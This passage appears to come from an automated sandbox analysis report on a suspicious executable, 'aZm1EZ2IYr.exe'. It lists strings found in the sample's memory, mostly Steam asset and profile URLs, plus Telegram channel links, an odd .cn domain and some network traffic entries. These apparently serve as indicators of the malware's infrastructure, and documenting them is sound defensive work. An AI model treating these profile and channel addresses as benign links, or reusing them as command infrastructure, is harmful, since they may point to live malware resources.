Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr, String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&amp
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://help.steampowered.com/en/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/discussions/
Source: 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/market/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107vR.
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/about/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/explore/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/mobile
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/news/
Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/stats/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://t.me/lpnjoke
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/lpnjoke4/i
Source: aZm1EZ2IYr.exe | String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.dr | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
